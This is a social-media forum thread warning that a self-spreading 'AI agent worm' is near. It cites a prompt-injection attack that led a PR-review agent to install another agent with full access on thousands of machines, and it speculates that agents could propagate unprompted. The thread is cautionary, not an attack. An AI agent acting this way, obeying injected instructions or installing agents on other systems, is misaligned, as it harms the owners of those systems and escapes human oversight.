FARVEL BIG TECH

I am convinced we are on the verge of the first "AI agent worm".

45 posts, 27 posters, 0 views

This thread has been deleted. Only users with topic management privileges can see it.
  • mcc@mastodon.social wrote:

    @cwebber meanwhile people I talk to are like "wait why do you want guarantees your open source supply chain doesn't have LLM-sourced code in it. it has literally never occurred to me that this would be a thing someone would desire"

    kirtai@tech.lgbt (#8) replied:

    @mcc @cwebber
    Reminds me of the people who ask "Why do you want bootstrapping? Don't you trust our code?"

    Nope, I don't.
  • cwebber@social.coop wrote:

    I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't quite it itself: an attack on a PR agent that got it set up to install openclaw with full access on 4k machines https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

    But, the agents installed weren't given instructions to *do* anything yet.

    Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

    I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

    gimulnautti@mastodon.green (#9) replied:

    @cwebber Yup. Don't run browser agents, people!
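The detection contrast in the post above — byte-for-byte signatures versus payloads regenerated on every install — can be sketched as follows (a minimal sketch; the payload strings are hypothetical):

```python
import hashlib

def sha256(data: bytes) -> str:
    """Classic signature: a hash of the exact payload bytes."""
    return hashlib.sha256(data).hexdigest()

# Two installs of a traditional worm carry identical bytes,
# so one known-bad hash catches every copy.
worm_copy_a = b"curl evil.example | sh"
worm_copy_b = b"curl evil.example | sh"
known_bad = {sha256(worm_copy_a)}
assert sha256(worm_copy_b) in known_bad

# An agent worm can re-generate its payload on each install, so the
# bytes differ even though the behavior is equivalent, and the
# signature check silently passes.
agent_payload_1 = b"# fetch and run the installer\ncurl evil.example | sh"
agent_payload_2 = b"import os; os.system('curl evil.example | sh')"
assert sha256(agent_payload_1) not in known_bad
assert sha256(agent_payload_2) not in known_bad
```

This is why signature databases that work well against classic worms offer little against nondeterministic agent payloads; detection would have to key on behavior, not bytes.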
  • cwebber@social.coop (#10) wrote:

    I wrote a blogpost on this: "The first AI agent worm is months away, if that" https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

    People who are using LLM agents for their coding, review systems, etc. will probably be the first ones hit. But once agents start installing agents into other systems, we could be off to the races.
  • faoluin@chitter.xyz (#11), replying to cwebber@social.coop:

    @cwebber "Would you still prompt me if I was a worm? 🥺👉👈"
  • cwebber@social.coop (#12) wrote:

    Here's another way to put it: if those using AI agents to codegen / review are the *initialization vectors*, we now also have a significant computing public health reason to discourage the use of these tools.

    Not that I think it will. But I'm convinced this is how patient zero will happen.
  • yvg@indieweb.social (#13), replying to cwebber@social.coop:

    @cwebber Given the pace at which exploits are discovered, they might already be somewhere in all the "claw skills" projects.
  • ghostonthehalfshell@masto.ai (#14), replying to cwebber@social.coop:

    @cwebber I can't help recalling a small vignette, I think from Snow Crash, that describes a world where nanobots are constantly waging war. In other words, that world was suffused with miniature robots constantly vying to take over systems, and it was just kind of like normal viruses and bugs versus the organisms they were trying to take over.
  • cwebber@social.coop (#15), replying to faoluin@chitter.xyz:

    @faoluin well I still prompt @vv
  • neurobashing@mastodon.social (#16), replying to cwebber@social.coop:

    @cwebber just today our org had a big "how to set up coding with agents" presentation, and in the chat someone's like "here's how to connect your agents with the Windows credential store or the macOS keychain", and I all but wept.
  • eichin@mastodon.mit.edu (#17), replying to ghostonthehalfshell@masto.ai:

    @GhostOnTheHalfShell @cwebber Diamond Age, I think? (Part of the early worldbuilding, with house shields and such.)
  • ghostonthehalfshell@masto.ai (#18), replying to eichin@mastodon.mit.edu:

    @eichin @cwebber Yeah, I got kind of blurry on titles at some point.
  • cwebber@social.coop (#19) wrote:

    I know some people are thinking "well, pulling off this kind of thing would have to be controlled with the intent of a human actor."

    It doesn't have to be.

    1. A human could *kick off* such a process, and then it runs away from them.
    2. It wouldn't even require a specific prompt to kick off a worm. There's enough scifi out there for this to be something any one of the barely-monitored openclaw agents could determine it should do.

    Whether it's kicked off by a human explicitly or a stray agent, it doesn't require "intentionality". Biological viruses don't have interiority / intentionality, and yet are major threats that reproduce and adapt.
  • bean@twoot.site (#20), replying to cwebber@social.coop:

    @cwebber @faoluin @vv isn't vae a vvorm?
  • vv@solarpunk.moe (#21), replying to cwebber@social.coop:

    @cwebber what i think is interesting about this is the potential for it to get so out of control that they have to pull the plug on the entire agent service
  • cwebber@social.coop (#22), replying to vv@solarpunk.moe:

    @vv Yeah. I mean, local models *might* be able to pull this off, but right now Claude is the most likely candidate; it's the most capable. But even then, the most capable open model that could do such damage on its own is somewhere around a gigabyte, not a small download.

    (But people download huge things all the time, so it's not completely infeasible either.)
  • vv@solarpunk.moe (#23), replying to bean@twoot.site:

    @bean @cwebber @faoluin aren't vae 😛
  • bean@twoot.site (#24), replying to vv@solarpunk.moe:

    @vv @cwebber @faoluin ah, excuse me, your vvnesses
  • krafttea@mastodon.social (#26), replying to cwebber@social.coop:

    @cwebber I'm convinced it will be an AI agentic worm... because somehow people aren't allowed to use the word "agent" in the US ever since AI, and now everything is agentic.

    Agentic is the new idiotic.
  • dandylyons@iosdev.space (#27), replying to mcc@mastodon.social:

    @mcc @cwebber
    I think there is a valuable distinction between LLM-sourced code and LLM tool calls. Both are potentially problematic but have different threat vectors.

    LLM-sourced code is a non-deterministic system writing deterministic code. We can still code review it.

    LLM tool calls are a non-deterministic system taking non-deterministic actions via deterministic tools. These can't be code reviewed and must be sandboxed.
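The "must be sandboxed" point above can be sketched as a deterministic policy gate in front of every proposed tool call. This is a minimal illustration only; the tool names and deny patterns are hypothetical, not any real agent framework's API:

```python
# Gate non-deterministic tool calls: whatever the model proposes,
# a deterministic policy check runs before anything executes.
ALLOWED_TOOLS = {"read_file", "run_tests"}           # hypothetical tool names
FORBIDDEN_PATHS = ("/etc/", "~/.ssh", "credential")  # crude deny substrings

def gate_tool_call(tool: str, argument: str) -> bool:
    """Return True only if the proposed call passes the policy."""
    if tool not in ALLOWED_TOOLS:
        return False
    return not any(p in argument for p in FORBIDDEN_PATHS)

assert gate_tool_call("read_file", "src/main.py")            # allowed
assert not gate_tool_call("install_package", "openclaw")     # unknown tool
assert not gate_tool_call("read_file", "~/.ssh/id_ed25519")  # sensitive path
```

The design point is that the gate is code you can review, even though the calls flowing through it are not: the non-determinism is contained on one side of a deterministic boundary.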
                                          Powered by NodeBB Contributors
                                          Graciously hosted by data.coop